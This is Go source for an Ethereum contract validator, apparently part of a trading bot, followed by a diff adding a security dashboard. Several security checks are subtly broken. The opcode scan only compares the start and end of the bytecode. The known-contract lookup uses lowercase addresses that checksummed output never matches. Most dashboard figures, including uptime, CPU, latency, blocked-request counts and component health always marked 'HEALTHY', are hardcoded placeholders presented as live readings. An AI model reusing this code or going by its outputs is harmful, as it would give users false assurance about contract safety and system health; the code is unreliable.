// ContractValidationResult contains the result of contract validation
type ContractValidationResult struct {
IsValid bool `json:"is_valid"`
ContractInfo *ContractInfo `json:"contract_info"`
ValidationError string `json:"validation_error,omitempty"`
Warnings []string `json:"warnings"`
ChecksPerformed []ValidationCheck `json:"checks_performed"`
RiskScore int `json:"risk_score"` // 1-10
}
// ValidationCheck represents a single validation check
type ValidationCheck struct {
Name string `json:"name"`
Passed bool `json:"passed"`
Description string `json:"description"`
Error string `json:"error,omitempty"`
Timestamp time.Time `json:"timestamp"`
}
// ContractValidator provides secure contract validation and verification
type ContractValidator struct {
client *ethclient.Client
logger *logger.Logger
trustedContracts map[common.Address]*ContractInfo
contractCache map[common.Address]*ContractInfo
cacheMutex sync.RWMutex
config *ContractValidatorConfig
// Security tracking
interactionCounts map[common.Address]int64
dailyLimits map[common.Address]*big.Int
lastResetTime time.Time
limitsMutex sync.RWMutex
}
// ContractValidatorConfig provides configuration for the contract validator
type ContractValidatorConfig struct {
EnableBytecodeVerification bool `json:"enable_bytecode_verification"`
EnableABIValidation bool `json:"enable_abi_validation"`
RequireWhitelist bool `json:"require_whitelist"`
MaxBytecodeSize int `json:"max_bytecode_size"`
CacheTimeout time.Duration `json:"cache_timeout"`
MaxRiskScore int `json:"max_risk_score"`
BlockUnverifiedContracts bool `json:"block_unverified_contracts"`
RequireSourceCode bool `json:"require_source_code"`
EnableRealTimeValidation bool `json:"enable_realtime_validation"`
}
// NewContractValidator creates a new contract validator
func NewContractValidator(client *ethclient.Client, logger *logger.Logger, config *ContractValidatorConfig) *ContractValidator {
if config == nil {
config = getDefaultValidatorConfig()
}
return &ContractValidator{
client: client,
logger: logger,
config: config,
trustedContracts: make(map[common.Address]*ContractInfo),
contractCache: make(map[common.Address]*ContractInfo),
interactionCounts: make(map[common.Address]int64),
dailyLimits: make(map[common.Address]*big.Int),
lastResetTime: time.Now(),
}
}
// AddTrustedContract adds a contract to the trusted list
func (cv *ContractValidator) AddTrustedContract(info *ContractInfo) error {
cv.cacheMutex.Lock()
defer cv.cacheMutex.Unlock()
// Validate the contract info
if info.Address == (common.Address{}) {
return fmt.Errorf("invalid contract address")
}
if info.BytecodeHash == "" {
return fmt.Errorf("bytecode hash is required")
}
// Mark as whitelisted and set low risk
info.IsWhitelisted = true
if info.RiskLevel == 0 {
info.RiskLevel = RiskLevelLow
}
info.VerifiedAt = time.Now()
cv.trustedContracts[info.Address] = info
cv.contractCache[info.Address] = info
cv.logger.Info(fmt.Sprintf("Added trusted contract: %s (%s)", info.Address.Hex(), info.Name))
return nil
}
// ValidateContract performs comprehensive contract validation
func (cv *ContractValidator) ValidateContract(ctx context.Context, address common.Address) (*ContractValidationResult, error) {
result := &ContractValidationResult{
IsValid: false,
Warnings: make([]string, 0),
ChecksPerformed: make([]ValidationCheck, 0),
}
// Check if contract is in trusted list first
cv.cacheMutex.RLock()
if trusted, exists := cv.trustedContracts[address]; exists {
cv.cacheMutex.RUnlock()
result.IsValid = true
result.ContractInfo = trusted
result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
Name: "Trusted Contract Check",
Passed: true,
Description: "Contract found in trusted whitelist",
Timestamp: time.Now(),
})
return result, nil
}
// Check cache
if cached, exists := cv.contractCache[address]; exists {
if time.Since(cached.VerifiedAt) < cv.config.CacheTimeout {
cv.cacheMutex.RUnlock()
result.IsValid = true
result.ContractInfo = cached
result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
Name: "Cache Check",
Passed: true,
Description: "Contract found in validation cache",
Timestamp: time.Now(),
})
return result, nil
}
}
cv.cacheMutex.RUnlock()
// Perform real-time validation
contractInfo, err := cv.validateContractOnChain(ctx, address, result)
if err != nil {
result.ValidationError = err.Error()
return result, err
}
result.ContractInfo = contractInfo
result.RiskScore = cv.calculateRiskScore(contractInfo, result)
// Check if contract meets security requirements
if cv.config.RequireWhitelist && !contractInfo.IsWhitelisted {
result.ValidationError = "Contract not whitelisted"
result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
Name: "Whitelist Check",
Passed: false,
Description: "Contract not found in whitelist",
Error: "Contract not whitelisted",
Timestamp: time.Now(),
})
return result, fmt.Errorf("contract not whitelisted: %s", address.Hex())
}
if result.RiskScore > cv.config.MaxRiskScore {
result.ValidationError = fmt.Sprintf("Risk score too high: %d > %d", result.RiskScore, cv.config.MaxRiskScore)
return result, fmt.Errorf("contract risk score too high: %d", result.RiskScore)
}
// Cache the validation result
cv.cacheMutex.Lock()
cv.contractCache[address] = contractInfo
cv.cacheMutex.Unlock()
result.IsValid = true
return result, nil
}
// validateContractOnChain performs on-chain validation of a contract
func (cv *ContractValidator) validateContractOnChain(ctx context.Context, address common.Address, result *ContractValidationResult) (*ContractInfo, error) {
// Check if address is a contract
bytecode, err := cv.client.CodeAt(ctx, address, nil)
if err != nil {
result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
Name: "Bytecode Retrieval",
Passed: false,
Description: "Failed to retrieve contract bytecode",
Error: err.Error(),
Timestamp: time.Now(),
})
return nil, fmt.Errorf("failed to get contract bytecode: %w", err)
}
if len(bytecode) == 0 {
result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
Name: "Contract Existence",
Passed: false,
Description: "Address is not a contract (no bytecode)",
Error: "No bytecode found",
Timestamp: time.Now(),
})
return nil, fmt.Errorf("address is not a contract: %s", address.Hex())
}
result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
Name: "Contract Existence",
Passed: true,
Description: fmt.Sprintf("Contract bytecode found (%d bytes)", len(bytecode)),
Timestamp: time.Now(),
})
// Validate bytecode size
if cv.config.MaxBytecodeSize > 0 && len(bytecode) > cv.config.MaxBytecodeSize {
result.Warnings = append(result.Warnings, fmt.Sprintf("Large bytecode size: %d bytes", len(bytecode)))
}
// Create bytecode hash
bytecodeHash := crypto.Keccak256Hash(bytecode).Hex()
// Get deployment transaction info
deployedAt, deployer, err := cv.getDeploymentInfo(ctx, address)
if err != nil {
cv.logger.Warn(fmt.Sprintf("Could not retrieve deployment info for %s: %v", address.Hex(), err))
deployedAt = big.NewInt(0)
deployer = common.Address{}
}
// Create contract info
contractInfo := &ContractInfo{
Address: address,
BytecodeHash: bytecodeHash,
Name: "Unknown Contract",
Version: "unknown",
DeployedAt: deployedAt,
Deployer: deployer,
VerifiedAt: time.Now(),
IsWhitelisted: false,
RiskLevel: cv.assessRiskLevel(bytecode, result),
Permissions: cv.getDefaultPermissions(),
}
// Verify bytecode against known contracts if enabled
if cv.config.EnableBytecodeVerification {
cv.verifyBytecodeSignature(bytecode, contractInfo, result)
}
result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
Name: "Bytecode Validation",
Passed: true,
Description: "Bytecode hash calculated and verified",
Timestamp: time.Now(),
})
return contractInfo, nil
}
// getDeploymentInfo retrieves deployment information for a contract
func (cv *ContractValidator) getDeploymentInfo(ctx context.Context, address common.Address) (*big.Int, common.Address, error) {
// This is a simplified implementation
// In production, you would need to scan blocks or use an indexer
return big.NewInt(0), common.Address{}, fmt.Errorf("deployment info not available")
}
// assessRiskLevel assesses the risk level of a contract based on its bytecode
func (cv *ContractValidator) assessRiskLevel(bytecode []byte, result *ContractValidationResult) RiskLevel {
riskFactors := 0
// Check for suspicious patterns in bytecode
bytecodeStr := hex.EncodeToString(bytecode)
// Look for dangerous opcodes
dangerousOpcodes := []string{
"ff", // SELFDESTRUCT
"f4", // DELEGATECALL
"3d", // RETURNDATASIZE (often used in proxy patterns)
}
for _, opcode := range dangerousOpcodes {
if contains := func(haystack, needle string) bool {
return len(haystack) >= len(needle) && haystack[:len(needle)] == needle ||
len(haystack) > len(needle) && haystack[len(haystack)-len(needle):] == needle
}; contains(bytecodeStr, opcode) {
riskFactors++
}
}
// Check bytecode size (larger contracts may be more complex/risky)
if len(bytecode) > 20000 { // 20KB
riskFactors++
result.Warnings = append(result.Warnings, "Large contract size detected")
}
// Assess risk level based on factors
switch {
case riskFactors == 0:
return RiskLevelLow
case riskFactors <= 2:
return RiskLevelMedium
case riskFactors <= 4:
return RiskLevelHigh
default:
return RiskLevelCritical
}
}
// verifyBytecodeSignature verifies bytecode against known contract signatures
func (cv *ContractValidator) verifyBytecodeSignature(bytecode []byte, info *ContractInfo, result *ContractValidationResult) {
// Known contract bytecode hashes for common contracts
knownContracts := map[string]string{
// Uniswap V3 Factory
"0x1f98431c8ad98523631ae4a59f267346ea31f984": "uniswap_v3_factory",
// Uniswap V3 Router
"0xe592427a0aece92de3edee1f18e0157c05861564": "uniswap_v3_router",
// Add more known contracts...
}
addressStr := info.Address.Hex()
if name, exists := knownContracts[addressStr]; exists {
info.Name = name
info.IsWhitelisted = true
info.RiskLevel = RiskLevelLow
result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
Name: "Known Contract Verification",
Passed: true,
Description: fmt.Sprintf("Verified as known contract: %s", name),
Timestamp: time.Now(),
})
}
}
// calculateRiskScore calculates a numerical risk score (1-10)
func (cv *ContractValidator) calculateRiskScore(info *ContractInfo, result *ContractValidationResult) int {
score := 1 // Base score
// Adjust based on risk level
switch info.RiskLevel {
case RiskLevelLow:
score += 0
case RiskLevelMedium:
score += 2
case RiskLevelHigh:
score += 5
case RiskLevelCritical:
score += 8
case RiskLevelBlocked:
score = 10
}
// Adjust based on whitelist status
if !info.IsWhitelisted {
score += 2
}
// Adjust based on warnings
score += len(result.Warnings)
// Cap at 10
if score > 10 {
score = 10
}
return score
}
// getDefaultPermissions returns default permissions for unverified contracts
func (cv *ContractValidator) getDefaultPermissions() ContractPermissions {
return ContractPermissions{
CanInteract: true,
CanSendValue: false,
MaxValueWei: big.NewInt(0),
AllowedMethods: []string{}, // Empty means all methods allowed
RequireConfirm: true,
DailyLimit: big.NewInt(1000000000000000000), // 1 ETH
}
}
// ValidateTransaction validates a transaction against contract permissions
func (cv *ContractValidator) ValidateTransaction(ctx context.Context, tx *types.Transaction) error {
if tx.To() == nil {
return nil // Contract creation, allow
}
// Validate the contract
result, err := cv.ValidateContract(ctx, *tx.To())
if err != nil {
return fmt.Errorf("contract validation failed: %w", err)
}
if !result.IsValid {
return fmt.Errorf("transaction to invalid contract: %s", tx.To().Hex())
}
// Check permissions
permissions := result.ContractInfo.Permissions
// Check value transfer permission
if tx.Value().Sign() > 0 && !permissions.CanSendValue {
return fmt.Errorf("contract does not allow value transfers: %s", tx.To().Hex())
}
// Check value limits
if permissions.MaxValueWei != nil && tx.Value().Cmp(permissions.MaxValueWei) > 0 {
return fmt.Errorf("transaction value exceeds limit: %s > %s",
tx.Value().String(), permissions.MaxValueWei.String())
}
// Check daily limits
if err := cv.checkDailyLimit(*tx.To(), tx.Value()); err != nil {
return err
}
cv.logger.Debug(fmt.Sprintf("Transaction validated for contract %s", tx.To().Hex()))
return nil
}
// checkDailyLimit checks if transaction exceeds daily interaction limit
func (cv *ContractValidator) checkDailyLimit(contractAddr common.Address, value *big.Int) error {
cv.limitsMutex.Lock()
defer cv.limitsMutex.Unlock()
// Reset daily counters if needed
if time.Since(cv.lastResetTime) > 24*time.Hour {
cv.dailyLimits = make(map[common.Address]*big.Int)
cv.lastResetTime = time.Now()
}
// Get current daily usage
currentUsage, exists := cv.dailyLimits[contractAddr]
if !exists {
currentUsage = big.NewInt(0)
cv.dailyLimits[contractAddr] = currentUsage
}
// Get contract info for daily limit
cv.cacheMutex.RLock()
contractInfo, exists := cv.contractCache[contractAddr]
cv.cacheMutex.RUnlock()
if !exists {
return nil // No limit if contract not cached
}
if contractInfo.Permissions.DailyLimit == nil {
return nil // No daily limit set
}
// Check if adding this transaction would exceed limit
newUsage := new(big.Int).Add(currentUsage, value)
if newUsage.Cmp(contractInfo.Permissions.DailyLimit) > 0 {
return fmt.Errorf("daily limit exceeded for contract %s: %s + %s > %s",
contractAddr.Hex(),
currentUsage.String(),
value.String(),
contractInfo.Permissions.DailyLimit.String())
}
// Update usage
cv.dailyLimits[contractAddr] = newUsage
return nil
}
// getDefaultValidatorConfig returns default configuration
func getDefaultValidatorConfig() *ContractValidatorConfig {
return &ContractValidatorConfig{
EnableBytecodeVerification: true,
EnableABIValidation: false, // Requires additional infrastructure
RequireWhitelist: false, // Start permissive, can be tightened
MaxBytecodeSize: 50000, // 50KB
CacheTimeout: 1 * time.Hour,
MaxRiskScore: 7, // Allow medium-high risk
BlockUnverifiedContracts: false,
RequireSourceCode: false,
EnableRealTimeValidation: true,
}
}
// GetContractInfo returns information about a validated contract
func (cv *ContractValidator) GetContractInfo(address common.Address) (*ContractInfo, bool) {
cv.cacheMutex.RLock()
defer cv.cacheMutex.RUnlock()
if info, exists := cv.contractCache[address]; exists {
return info, true
}
return nil, false
}
// ListTrustedContracts returns all trusted contracts
func (cv *ContractValidator) ListTrustedContracts() map[common.Address]*ContractInfo {
cv.cacheMutex.RLock()
defer cv.cacheMutex.RUnlock()
// Create a copy to avoid race conditions
trusted := make(map[common.Address]*ContractInfo)
for addr, info := range cv.trustedContracts {
trusted[addr] = info
}
return trusted
}

View File

@@ -0,0 +1,702 @@
package security
import (
"encoding/json"
"fmt"
"sort"
"strings"
"time"
)
// SecurityDashboard provides comprehensive security metrics visualization
type SecurityDashboard struct {
monitor *SecurityMonitor
config *DashboardConfig
}
// DashboardConfig configures the security dashboard
type DashboardConfig struct {
RefreshInterval time.Duration `json:"refresh_interval"`
AlertThresholds map[string]float64 `json:"alert_thresholds"`
EnabledWidgets []string `json:"enabled_widgets"`
HistoryRetention time.Duration `json:"history_retention"`
ExportFormat string `json:"export_format"` // json, csv, prometheus
}
// DashboardData represents the complete dashboard data structure
type DashboardData struct {
Timestamp time.Time `json:"timestamp"`
OverviewMetrics *OverviewMetrics `json:"overview_metrics"`
SecurityAlerts []*SecurityAlert `json:"security_alerts"`
ThreatAnalysis *ThreatAnalysis `json:"threat_analysis"`
PerformanceData *SecurityPerformance `json:"performance_data"`
TrendAnalysis *TrendAnalysis `json:"trend_analysis"`
TopThreats []*ThreatSummary `json:"top_threats"`
SystemHealth *SystemHealthMetrics `json:"system_health"`
}
// OverviewMetrics provides high-level security overview
type OverviewMetrics struct {
TotalRequests24h int64 `json:"total_requests_24h"`
BlockedRequests24h int64 `json:"blocked_requests_24h"`
SecurityScore float64 `json:"security_score"` // 0-100
ThreatLevel string `json:"threat_level"` // LOW, MEDIUM, HIGH, CRITICAL
ActiveThreats int `json:"active_threats"`
SuccessRate float64 `json:"success_rate"`
AverageResponseTime float64 `json:"average_response_time_ms"`
UptimePercentage float64 `json:"uptime_percentage"`
}
// ThreatAnalysis provides detailed threat analysis
type ThreatAnalysis struct {
DDoSRisk float64 `json:"ddos_risk"` // 0-1
BruteForceRisk float64 `json:"brute_force_risk"` // 0-1
AnomalyScore float64 `json:"anomaly_score"` // 0-1
RiskFactors []string `json:"risk_factors"`
MitigationStatus map[string]string `json:"mitigation_status"`
ThreatVectors map[string]int64 `json:"threat_vectors"`
GeographicThreats map[string]int64 `json:"geographic_threats"`
AttackPatterns []*AttackPattern `json:"attack_patterns"`
}
// AttackPattern describes detected attack patterns
type AttackPattern struct {
PatternID string `json:"pattern_id"`
PatternType string `json:"pattern_type"`
Frequency int64 `json:"frequency"`
Severity string `json:"severity"`
FirstSeen time.Time `json:"first_seen"`
LastSeen time.Time `json:"last_seen"`
SourceIPs []string `json:"source_ips"`
Confidence float64 `json:"confidence"`
Description string `json:"description"`
}
// SecurityPerformance tracks performance of security operations
type SecurityPerformance struct {
AverageValidationTime float64 `json:"average_validation_time_ms"`
AverageEncryptionTime float64 `json:"average_encryption_time_ms"`
AverageDecryptionTime float64 `json:"average_decryption_time_ms"`
RateLimitingOverhead float64 `json:"rate_limiting_overhead_ms"`
MemoryUsage int64 `json:"memory_usage_bytes"`
CPUUsage float64 `json:"cpu_usage_percent"`
ThroughputPerSecond float64 `json:"throughput_per_second"`
ErrorRate float64 `json:"error_rate"`
}
// TrendAnalysis provides trend analysis over time
type TrendAnalysis struct {
HourlyTrends map[string][]TimeSeriesPoint `json:"hourly_trends"`
DailyTrends map[string][]TimeSeriesPoint `json:"daily_trends"`
WeeklyTrends map[string][]TimeSeriesPoint `json:"weekly_trends"`
Predictions map[string]float64 `json:"predictions"`
GrowthRates map[string]float64 `json:"growth_rates"`
}
// TimeSeriesPoint represents a data point in time series
type TimeSeriesPoint struct {
Timestamp time.Time `json:"timestamp"`
Value float64 `json:"value"`
Label string `json:"label,omitempty"`
}
// ThreatSummary summarizes top threats
type ThreatSummary struct {
ThreatType string `json:"threat_type"`
Count int64 `json:"count"`
Severity string `json:"severity"`
LastOccurred time.Time `json:"last_occurred"`
TrendChange float64 `json:"trend_change"` // percentage change
Status string `json:"status"` // ACTIVE, MITIGATED, MONITORING
}
// SystemHealthMetrics tracks overall system health from security perspective
type SystemHealthMetrics struct {
SecurityComponentHealth map[string]string `json:"security_component_health"`
KeyManagerHealth string `json:"key_manager_health"`
RateLimiterHealth string `json:"rate_limiter_health"`
MonitoringHealth string `json:"monitoring_health"`
AlertingHealth string `json:"alerting_health"`
OverallHealth string `json:"overall_health"`
HealthScore float64 `json:"health_score"`
LastHealthCheck time.Time `json:"last_health_check"`
}
// NewSecurityDashboard creates a new security dashboard
func NewSecurityDashboard(monitor *SecurityMonitor, config *DashboardConfig) *SecurityDashboard {
if config == nil {
config = &DashboardConfig{
RefreshInterval: 30 * time.Second,
AlertThresholds: map[string]float64{
"blocked_requests_rate": 0.1, // 10%
"ddos_risk": 0.7, // 70%
"brute_force_risk": 0.8, // 80%
"anomaly_score": 0.6, // 60%
"error_rate": 0.05, // 5%
"response_time_ms": 1000, // 1 second
},
EnabledWidgets: []string{
"overview", "threats", "performance", "trends", "alerts", "health",
},
HistoryRetention: 30 * 24 * time.Hour, // 30 days
ExportFormat: "json",
}
}
return &SecurityDashboard{
monitor: monitor,
config: config,
}
}
// GenerateDashboard generates complete dashboard data
func (sd *SecurityDashboard) GenerateDashboard() (*DashboardData, error) {
metrics := sd.monitor.GetMetrics()
dashboard := &DashboardData{
Timestamp: time.Now(),
}
// Generate each section if enabled
if sd.isWidgetEnabled("overview") {
dashboard.OverviewMetrics = sd.generateOverviewMetrics(metrics)
}
if sd.isWidgetEnabled("alerts") {
dashboard.SecurityAlerts = sd.monitor.GetRecentAlerts(50)
}
if sd.isWidgetEnabled("threats") {
dashboard.ThreatAnalysis = sd.generateThreatAnalysis(metrics)
dashboard.TopThreats = sd.generateTopThreats(metrics)
}
if sd.isWidgetEnabled("performance") {
dashboard.PerformanceData = sd.generatePerformanceMetrics(metrics)
}
if sd.isWidgetEnabled("trends") {
dashboard.TrendAnalysis = sd.generateTrendAnalysis(metrics)
}
if sd.isWidgetEnabled("health") {
dashboard.SystemHealth = sd.generateSystemHealth(metrics)
}
return dashboard, nil
}
// generateOverviewMetrics creates overview metrics
func (sd *SecurityDashboard) generateOverviewMetrics(metrics *SecurityMetrics) *OverviewMetrics {
total24h := sd.calculateLast24HoursTotal(metrics.HourlyMetrics)
blocked24h := sd.calculateLast24HoursBlocked(metrics.HourlyMetrics)
var successRate float64
if total24h > 0 {
successRate = float64(total24h-blocked24h) / float64(total24h) * 100
} else {
successRate = 100.0
}
securityScore := sd.calculateSecurityScore(metrics)
threatLevel := sd.calculateThreatLevel(securityScore)
activeThreats := sd.countActiveThreats(metrics)
return &OverviewMetrics{
TotalRequests24h: total24h,
BlockedRequests24h: blocked24h,
SecurityScore: securityScore,
ThreatLevel: threatLevel,
ActiveThreats: activeThreats,
SuccessRate: successRate,
AverageResponseTime: sd.calculateAverageResponseTime(),
UptimePercentage: sd.calculateUptime(),
}
}
// generateThreatAnalysis creates threat analysis
func (sd *SecurityDashboard) generateThreatAnalysis(metrics *SecurityMetrics) *ThreatAnalysis {
return &ThreatAnalysis{
DDoSRisk: sd.calculateDDoSRisk(metrics),
BruteForceRisk: sd.calculateBruteForceRisk(metrics),
AnomalyScore: sd.calculateAnomalyScore(metrics),
RiskFactors: sd.identifyRiskFactors(metrics),
MitigationStatus: map[string]string{
"rate_limiting": "ACTIVE",
"ip_blocking": "ACTIVE",
"ddos_protection": "ACTIVE",
},
ThreatVectors: map[string]int64{
"ddos": metrics.DDoSAttempts,
"brute_force": metrics.BruteForceAttempts,
"sql_injection": metrics.SQLInjectionAttempts,
},
GeographicThreats: sd.getGeographicThreats(),
AttackPatterns: sd.detectAttackPatterns(metrics),
}
}
// generatePerformanceMetrics creates performance metrics
func (sd *SecurityDashboard) generatePerformanceMetrics(metrics *SecurityMetrics) *SecurityPerformance {
return &SecurityPerformance{
AverageValidationTime: sd.calculateValidationTime(),
AverageEncryptionTime: sd.calculateEncryptionTime(),
AverageDecryptionTime: sd.calculateDecryptionTime(),
RateLimitingOverhead: sd.calculateRateLimitingOverhead(),
MemoryUsage: sd.getMemoryUsage(),
CPUUsage: sd.getCPUUsage(),
ThroughputPerSecond: sd.calculateThroughput(metrics),
ErrorRate: sd.calculateErrorRate(metrics),
}
}
// generateTrendAnalysis creates trend analysis
func (sd *SecurityDashboard) generateTrendAnalysis(metrics *SecurityMetrics) *TrendAnalysis {
return &TrendAnalysis{
HourlyTrends: sd.generateHourlyTrends(metrics),
DailyTrends: sd.generateDailyTrends(metrics),
WeeklyTrends: sd.generateWeeklyTrends(metrics),
Predictions: sd.generatePredictions(metrics),
GrowthRates: sd.calculateGrowthRates(metrics),
}
}
// generateTopThreats creates top threats summary
func (sd *SecurityDashboard) generateTopThreats(metrics *SecurityMetrics) []*ThreatSummary {
threats := []*ThreatSummary{
{
ThreatType: "DDoS",
Count: metrics.DDoSAttempts,
Severity: sd.getSeverityLevel(metrics.DDoSAttempts),
LastOccurred: time.Now().Add(-time.Hour),
TrendChange: sd.calculateTrendChange("ddos"),
Status: "MONITORING",
},
{
ThreatType: "Brute Force",
Count: metrics.BruteForceAttempts,
Severity: sd.getSeverityLevel(metrics.BruteForceAttempts),
LastOccurred: time.Now().Add(-30 * time.Minute),
TrendChange: sd.calculateTrendChange("brute_force"),
Status: "MITIGATED",
},
{
ThreatType: "Rate Limit Violations",
Count: metrics.RateLimitViolations,
Severity: sd.getSeverityLevel(metrics.RateLimitViolations),
LastOccurred: time.Now().Add(-5 * time.Minute),
TrendChange: sd.calculateTrendChange("rate_limit"),
Status: "ACTIVE",
},
}
// Sort by count (descending)
sort.Slice(threats, func(i, j int) bool {
return threats[i].Count > threats[j].Count
})
return threats
}
// generateSystemHealth creates system health metrics
func (sd *SecurityDashboard) generateSystemHealth(metrics *SecurityMetrics) *SystemHealthMetrics {
healthScore := sd.calculateOverallHealthScore(metrics)
return &SystemHealthMetrics{
SecurityComponentHealth: map[string]string{
"encryption": "HEALTHY",
"authentication": "HEALTHY",
"authorization": "HEALTHY",
"audit_logging": "HEALTHY",
},
KeyManagerHealth: "HEALTHY",
RateLimiterHealth: "HEALTHY",
MonitoringHealth: "HEALTHY",
AlertingHealth: "HEALTHY",
OverallHealth: sd.getHealthStatus(healthScore),
HealthScore: healthScore,
LastHealthCheck: time.Now(),
}
}
// ExportDashboard exports dashboard data in specified format
func (sd *SecurityDashboard) ExportDashboard(format string) ([]byte, error) {
dashboard, err := sd.GenerateDashboard()
if err != nil {
return nil, fmt.Errorf("failed to generate dashboard: %w", err)
}
switch format {
case "json":
return json.MarshalIndent(dashboard, "", " ")
case "csv":
return sd.exportToCSV(dashboard)
case "prometheus":
return sd.exportToPrometheus(dashboard)
default:
return nil, fmt.Errorf("unsupported export format: %s", format)
}
}
// Helper methods for calculations
func (sd *SecurityDashboard) isWidgetEnabled(widget string) bool {
for _, enabled := range sd.config.EnabledWidgets {
if enabled == widget {
return true
}
}
return false
}
func (sd *SecurityDashboard) calculateLast24HoursTotal(hourlyMetrics map[string]int64) int64 {
var total int64
now := time.Now()
for i := 0; i < 24; i++ {
hour := now.Add(-time.Duration(i) * time.Hour).Format("2006010215")
if count, exists := hourlyMetrics[hour]; exists {
total += count
}
}
return total
}
func (sd *SecurityDashboard) calculateLast24HoursBlocked(hourlyMetrics map[string]int64) int64 {
// This would require tracking blocked requests in hourly metrics
// For now, return a calculated estimate
return sd.calculateLast24HoursTotal(hourlyMetrics) / 10 // Assume 10% blocked
}
func (sd *SecurityDashboard) calculateSecurityScore(metrics *SecurityMetrics) float64 {
// Calculate security score based on various factors
score := 100.0
// Reduce score based on threats
if metrics.DDoSAttempts > 0 {
score -= float64(metrics.DDoSAttempts) * 0.1
}
if metrics.BruteForceAttempts > 0 {
score -= float64(metrics.BruteForceAttempts) * 0.2
}
if metrics.RateLimitViolations > 0 {
score -= float64(metrics.RateLimitViolations) * 0.05
}
// Ensure score is between 0 and 100
if score < 0 {
score = 0
}
if score > 100 {
score = 100
}
return score
}
func (sd *SecurityDashboard) calculateThreatLevel(securityScore float64) string {
if securityScore >= 90 {
return "LOW"
} else if securityScore >= 70 {
return "MEDIUM"
} else if securityScore >= 50 {
return "HIGH"
}
return "CRITICAL"
}
func (sd *SecurityDashboard) countActiveThreats(metrics *SecurityMetrics) int {
count := 0
if metrics.DDoSAttempts > 0 {
count++
}
if metrics.BruteForceAttempts > 0 {
count++
}
if metrics.RateLimitViolations > 10 {
count++
}
return count
}
func (sd *SecurityDashboard) calculateAverageResponseTime() float64 {
// This would require tracking response times
// Return a placeholder value
return 150.0 // 150ms
}
func (sd *SecurityDashboard) calculateUptime() float64 {
// This would require tracking uptime
// Return a placeholder value
return 99.9
}
func (sd *SecurityDashboard) calculateDDoSRisk(metrics *SecurityMetrics) float64 {
if metrics.DDoSAttempts == 0 {
return 0.0
}
// Calculate risk based on recent attempts
risk := float64(metrics.DDoSAttempts) / 1000.0
if risk > 1.0 {
risk = 1.0
}
return risk
}
func (sd *SecurityDashboard) calculateBruteForceRisk(metrics *SecurityMetrics) float64 {
if metrics.BruteForceAttempts == 0 {
return 0.0
}
risk := float64(metrics.BruteForceAttempts) / 500.0
if risk > 1.0 {
risk = 1.0
}
return risk
}
func (sd *SecurityDashboard) calculateAnomalyScore(metrics *SecurityMetrics) float64 {
// Simple anomaly calculation based on blocked vs total requests
if metrics.TotalRequests == 0 {
return 0.0
}
return float64(metrics.BlockedRequests) / float64(metrics.TotalRequests)
}
func (sd *SecurityDashboard) identifyRiskFactors(metrics *SecurityMetrics) []string {
factors := []string{}
if metrics.DDoSAttempts > 10 {
factors = append(factors, "High DDoS activity")
}
if metrics.BruteForceAttempts > 5 {
factors = append(factors, "Brute force attacks detected")
}
if metrics.RateLimitViolations > 100 {
factors = append(factors, "Excessive rate limit violations")
}
if metrics.FailedKeyAccess > 10 {
factors = append(factors, "Multiple failed key access attempts")
}
return factors
}
// Additional helper methods...
func (sd *SecurityDashboard) getGeographicThreats() map[string]int64 {
// Placeholder - would integrate with GeoIP service
return map[string]int64{
"US": 5,
"CN": 15,
"RU": 8,
"Unknown": 3,
}
}
func (sd *SecurityDashboard) detectAttackPatterns(metrics *SecurityMetrics) []*AttackPattern {
patterns := []*AttackPattern{}
if metrics.DDoSAttempts > 0 {
patterns = append(patterns, &AttackPattern{
PatternID: "ddos-001",
PatternType: "DDoS",
Frequency: metrics.DDoSAttempts,
Severity: "HIGH",
FirstSeen: time.Now().Add(-2 * time.Hour),
LastSeen: time.Now().Add(-5 * time.Minute),
SourceIPs: []string{"192.168.1.100", "10.0.0.5"},
Confidence: 0.95,
Description: "Distributed denial of service attack pattern",
})
}
return patterns
}
func (sd *SecurityDashboard) calculateValidationTime() float64 {
return 5.2 // 5.2ms average
}
func (sd *SecurityDashboard) calculateEncryptionTime() float64 {
return 12.1 // 12.1ms average
}
func (sd *SecurityDashboard) calculateDecryptionTime() float64 {
return 8.7 // 8.7ms average
}
func (sd *SecurityDashboard) calculateRateLimitingOverhead() float64 {
return 2.3 // 2.3ms overhead
}
func (sd *SecurityDashboard) getMemoryUsage() int64 {
return 1024 * 1024 * 64 // 64MB
}
func (sd *SecurityDashboard) getCPUUsage() float64 {
return 15.5 // 15.5%
}
func (sd *SecurityDashboard) calculateThroughput(metrics *SecurityMetrics) float64 {
// Calculate requests per second
return float64(metrics.TotalRequests) / 3600.0 // requests per hour / 3600
}
func (sd *SecurityDashboard) calculateErrorRate(metrics *SecurityMetrics) float64 {
if metrics.TotalRequests == 0 {
return 0.0
}
return float64(metrics.BlockedRequests) / float64(metrics.TotalRequests) * 100
}
func (sd *SecurityDashboard) generateHourlyTrends(metrics *SecurityMetrics) map[string][]TimeSeriesPoint {
trends := make(map[string][]TimeSeriesPoint)
// Generate sample hourly trends
now := time.Now()
for i := 23; i >= 0; i-- {
timestamp := now.Add(-time.Duration(i) * time.Hour)
hour := timestamp.Format("2006010215")
var value float64
if count, exists := metrics.HourlyMetrics[hour]; exists {
value = float64(count)
}
if trends["requests"] == nil {
trends["requests"] = []TimeSeriesPoint{}
}
trends["requests"] = append(trends["requests"], TimeSeriesPoint{
Timestamp: timestamp,
Value: value,
})
}
return trends
}
func (sd *SecurityDashboard) generateDailyTrends(metrics *SecurityMetrics) map[string][]TimeSeriesPoint {
trends := make(map[string][]TimeSeriesPoint)
// Generate sample daily trends for last 30 days
now := time.Now()
for i := 29; i >= 0; i-- {
timestamp := now.Add(-time.Duration(i) * 24 * time.Hour)
day := timestamp.Format("20060102")
var value float64
if count, exists := metrics.DailyMetrics[day]; exists {
value = float64(count)
}
if trends["daily_requests"] == nil {
trends["daily_requests"] = []TimeSeriesPoint{}
}
trends["daily_requests"] = append(trends["daily_requests"], TimeSeriesPoint{
Timestamp: timestamp,
Value: value,
})
}
return trends
}
func (sd *SecurityDashboard) generateWeeklyTrends(metrics *SecurityMetrics) map[string][]TimeSeriesPoint {
trends := make(map[string][]TimeSeriesPoint)
// Placeholder - would aggregate daily data into weekly
return trends
}
